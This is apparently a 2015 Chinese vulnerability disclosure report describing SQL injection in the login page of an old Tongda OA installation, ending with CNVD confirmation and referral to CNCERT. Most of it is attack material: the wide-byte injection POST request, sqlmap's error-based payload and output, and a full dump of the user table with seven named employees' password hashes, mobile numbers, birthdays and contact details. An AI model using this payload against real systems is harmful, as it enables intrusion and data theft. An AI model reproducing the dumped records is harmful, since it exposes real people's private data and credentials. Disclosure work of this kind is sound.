2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
0x01 漏洞位置
http://**.**.**.**/
0x02 漏洞类型
sql注入
通达OA 老版本问题0x03 漏洞详情首先,参考了前辈的文章
http://**.**.**.**/bugs/wooyun-2010-078915
发现登录界面POST注入
PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27
0x04 漏洞请求参数于是乎,采用了前辈的注入方法
POST /logincheck.php HTTP/1.1Host: **.**.**.**Content-Length: 47Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: PHPSESSID=60491e719c9eb87a488878cc39fd0c34PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27
0x05 注入方法在利用了宽字节后,丢sqlmap,跑就好啦
0x06 漏洞测试结果
---Place: POSTParameter: UNAME Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: PASSWORD=g00dPa$$w0rD&submit=%b5%c7 %c2%bc&UI=0&UNAME=%bf' AND (SELECT 7167 FROM(SELECT COUNT(*),CONCAT(0x71736f7671,(SELECT (CASE WHEN (7167=7167) THEN 1 ELSE 0 END)),0x71656e7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hBls---[20:33:55] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.14, Apache 2.2.16back-end DBMS: MySQL 5.0available databases [5]:[*] BUS[*] crscell[*] information_schema[*] mysql[*] TD_OA
这里仅跑一下管理员表
Database: TD_OATable: user[7 entries]+-----+--------+---------+---------+---------------+-----------------+--------------+-----+------+-------------+---------+---------------------+-------+-------+-------+--------+---------+---------+---------+---------+------------+----------+--------+---------------+---------+----------+---------+----------+------------+----------+----------+------------------------------------+----------+-------------+----------+-------------+----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+--------------+-------------+-------------+-------------+--------------+-------------+--------------+--------------+--------------+--------------------------+--------------+--------------+----------------------------------+-------------------------+---------------+---------------+-----------------+----------------+---------------------+----------------+-----------------+-----------------+---------------------+------------------+| UID | PIC_ID | DEPT_ID | USER_ID | DEPT_ID_OTHER | MOBIL_NO_HIDDEN | MSN | SEX | UIN | BP_NO | PHOTO | EMAIL | PANEL | THEME | SCORE | SMS_ON | PORTAL | ICQ_NO | REMARK | KEY_SN | ONLINE | BYNAME | AVATAR | MY_RSS | USER_NO | OICQ_NO | BIND_IP | IS_LUNAR | BIRTHDAY | ADD_HOME | IM_RANGE | PASSWORD | DISABLED | SHORTCUT | BKGROUND | MOBIL_NO | SHOW_RSS | NOT_LOGIN | MY_STATUS | ON_STATUS | MOBILE_SP | POST_PRIV | USER_NAME | NICK_NAME | USER_PRIV | POST_DEPT | AUTHORIZE | DUTY_TYPE | MENU_TYPE | TDER_FLAG | USEING_KEY | NOT_SEARCH | MOBILE_PS1 | MENU_IMAGE | MOBILE_PS2 | CALL_SOUND | WEBMAIL_NUM | TEL_NO_HOME | FAX_NO_DEPT | MENU_EXPAND | USER_DEFINE | LIMIT_LOGIN | TEL_NO_DEPT | BBS_COUNTER | USING_FINGER | CANBROADCAST | CONCERN_USER | MYTABLE_LEFT | WEATHER_CITY | POST_NO_HOME | BBS_SIGNATURE | MYTABLE_RIGHT | SECURE_KEY_SN | NOT_VIEW_USER | LAST_VISIT_IP | NOT_VIEW_TABLE | LAST_PASS_TIME | EMAIL_CAPACITY | USER_PRIV_OTHER | FOLDER_CAPACITY | LAST_VISIT_TIME | WEBMAIL_CAPACITY |+-----+--------+---------+---------+---------------+-----------------+--------------+-----+------+-------------+---------+---------------------+-------+-------+-------+--------+---------+---------+---------+---------+------------+----------+--------+---------------+---------+----------+---------+----------+------------+----------+----------+------------------------------------+----------+-------------+----------+-------------+----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+--------------+-------------+-------------+-------------+--------------+-------------+--------------+--------------+--------------+--------------------------+--------------+--------------+----------------------------------+-------------------------+---------------+---------------+-----------------+----------------+---------------------+----------------+-----------------+-----------------+---------------------+------------------+| 1 | 0 | 98 | admin | <blank> | 0 | <blank> | 0 | 1001 | <blank> | <blank> | <blank> | 1 | 2 | 0 | 0 | <blank> | <blank> | <blank> | <blank> | 9355190 | <blank> | 9 | <blank> | 10 | <blank> | <blank> | 0 | 1900-01-01 | <blank> | 1 | $1$WC..nU/.$efr4y/J1UQA934qhesh4C/ | 0 | <blank> | <blank> | 13865952032 | 1 | 0 | <blank> | 1 | <blank> | 1 | 系统管理员 | <blank> | 1 | <blank> | 0 | 1 | 1 | 1 | 0 | 0 | <blank> | 0 | <blank> | 0 | 0 | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 35 | 0 | 1 | <blank> | 1,50,2,14,25,48,49, | 58321 | <blank> | <blank> | 6,23,3,17,16,9,18,7, | <blank> | 0 | **.**.**.** | 0 | 2015-05-08 11:26:20 | 0 | <blank> | 0 | 2015-11-20 15:08:57 | 0 || 2 | 84 | 90 | lzg | <blank> | 1 | ahlzg@**.**.**.** | 0 | 1002 | <blank> | <blank> | ahlzg@**.**.**.** | 1 | 1 | 0 | 0 | <blank> | <blank> | <blank> | <blank> | 2147483647 | lvzhiguo | 0 | 196,198,:197, | 7 | 10296293 | <blank> | 0 | 1977-04-17 | <blank> | 1 | $1$Wy4.nE/.$yfwjrUNZTq2nZa/.ae1.4. | 0 | 1,3,42,100, | <blank> | 18949800552 | 0 | 0 | <blank> | 1 | <blank> | 1 | 吕治国 | 被爱收藏 | 5 | <blank> | 0 | 1 | 1 | <blank> | 0 | 0 | <blank> | 0 | <blank> | 0 | 0 | <blank> | 0551-5321771 | <blank> | <blank> | 0 | 0551-5350758 | 251 | 0 | 1 | <blank> | 1,50,14,23,2,48, | 58321 | <blank> | 省公司运营中心-吕治国\r\n联系电话:0551-5350758 | 6,16,18,25,7,9, | <blank> | 0 | **.**.**.** | 0 | 2014-04-04 15:10:08 | 0 | 35, | 0 | 2015-11-18 15:39:46 | 0 || 3 | 0 | 67 | 姚立新 | <blank> | 1 | <blank> | 0 | 0 | <blank> | <blank> | <blank> | 1 | 1 | 0 | 1 | <blank> | <blank> | <blank> | <blank> | 49970624 | <blank> | 0 | <blank> | 10 | <blank> | <blank> | 0 | 1900-01-01 | <blank> | 1 | $1$/p1.a9/.$1qrDLozMX0FvdmdjgGpYB. | 0 | <blank> | <blank> | 13329266578 | 1 | 0 | <blank> | 1 | <blank> | 0 | 姚立新 | <blank> | 12 | <blank> | 0 | 1 | 1 | <blank> | 0 | 0 | <blank> | 0 | <blank> | 1 | 0 | <blank> | 0556-6121278 | <blank> | <blank> | 0 | 0556-6121278 | 0 | 0 | 0 | <blank> | 1,2,3,14,19,23,48,49,50, | 58424 | <blank> | <blank> | 6,4,7,16,17,18,20,25, | <blank> | 0 | **.**.**.** | 0 | 2009-10-27 08:12:05 | 20 | <blank> | 20 | 2015-11-20 15:17:57 | 0 || 4 | 0 | 64 | 魏小明 | <blank> | 0 | <blank> | 1 | 0 | <blank> | <blank> | <blank> | 1 | 3 | 0 | 1 | <blank> | <blank> | <blank> | <blank> | 44235710 | <blank> | 1 | <blank> | 10 | <blank> | <blank> | 0 | 1900-01-01 | <blank> | 1 | $1$mR/.1T4.$Iar.6v8xf.sxoJSsD17fo1 | 0 | <blank> | <blank> | <blank> | 1 | 0 | <blank> | 1 | <blank> | 0 | 魏小明 | <blank> | 18 | <blank> | 0 | 1 | 1 | <blank> | <blank> | 0 | <blank> | 0 | <blank> | 1 | 0 | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 0 | 0 | 0 | <blank> | 1,2,14,48,49,50, | 58429 | <blank> | <blank> | 5,6,7,9,16,17,18,21,24, | <blank> | 0 | **.**.**.** | 0 | 2007-09-20 08:31:35 | 100 | <blank> | 100 | 2015-11-20 09:03:23 | 0 || 5 | 0 | 98 | 方春霞 | <blank> | 0 | <blank> | 1 | 0 | <blank> | <blank> | fang_fcx@**.**.**.** | 1 | 1 | 0 | 1 | <blank> | <blank> | <blank> | <blank> | 56878973 | fcx | 1 | <blank> | 1 | <blank> | <blank> | 0 | 1976-04-10 | <blank> | 1 | $1$na3.kh4.$P4zNMYd2qFJ5JFfdAyYks. | 0 | <blank> | <blank> | 13956045400 | 1 | 0 | <blank> | 1 | <blank> | 1 | 方春霞 | <blank> | 4 | <blank> | 0 | 1 | 1 | <blank> | 0 | 0 | <blank> | 0 | <blank> | 1 | 0 | <blank> | 0551-5321771 | <blank> | <blank> | 0 | 0551-5350702 | 58 | 0 | 0 | <blank> | 1,50,3,14,2,23,48,49, | 58321 | <blank> | 总经办-方春霞 | 6,17,16,20,7,9, | <blank> | 0 | **.**.**.** | 0 | 2009-11-30 09:40:35 | 2000 | 1,22,23,5, | 0 | 2015-11-20 09:01:39 | 0 || 6 | 0 | 64 | 左清 | <blank> | 1 | <blank> | 0 | 0 | 18505627575 | <blank> | zuoqing@**.**.**.** | 1 | 8 | 0 | 0 | <blank> | <blank> | <blank> | <blank> | 15573796 | <blank> | 0 | <blank> | 10 | <blank> | <blank> | 0 | 1972-09-21 | <blank> | 1 | $1$kY2.da5.$VSWypAF81DZdv1yvwlohz0 | 0 | <blank> | <blank> | 13365517575 | 1 | 0 | <blank> | 1 | <blank> | 0 | 左清 | <blank> | 12 | <blank> | 0 | 1 | 1 | <blank> | 0 | 0 | <blank> | 0 | <blank> | 1 | 0 | <blank> | <blank> | <blank> | <blank> | 0 | 0562-7110168 | 9 | 0 | 0 | <blank> | 1,2,3,23,14,48,50, | 58321 | <blank> | <blank> | 6,7,16,17,18,20,9, | <blank> | 0 | **.**.**.** | 0 | 2006-03-10 09:26:32 | 100 | <blank> | 100 | 2015-11-19 09:01:34 | 0 || 7 | 0 | 89 | 余洁 | <blank> | 1 | <blank> | 1 | 0 | <blank> | <blank> | <blank> | 1 | 2 | 0 | 1 | <blank> | <blank> | <blank> | <blank> | 47833142 | collines | 1 | <blank> | 2 | <blank> | <blank> | 0 | 1979-03-23 | <blank> | 1 | $1$pa..8V5.$lZx2X58I55SypQ1KmrOxu0 | 0 | <blank> | <blank> | 15505517766 | 1 | 0 | <blank> | 1 | <blank> | 1 | 余洁 | <blank> | 5 | <blank> | 0 | 1 | 2 | <blank> | 0 | 0 | <blank> | 0 | <blank> | 0 | 0 | <blank> | 5321771 | <blank> | <blank> | 0 | 0551-5350722 | 0 | 0 | 0 | <blank> | 50,1,14,20,23, | 58321 | <blank> | <blank> | 6,2,9, | <blank> | 0 | **.**.**.** | 0 | 2010-04-09 09:13:35 | 400 | 13,35, | 100 | 2015-11-20 09:13:16 | 0 |
OK,全部的数据库信息都是可以得到的。。。
升级吧!!!
危害等级:中
漏洞Rank:10
确认时间:2015-11-27 10:18
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。
暂无
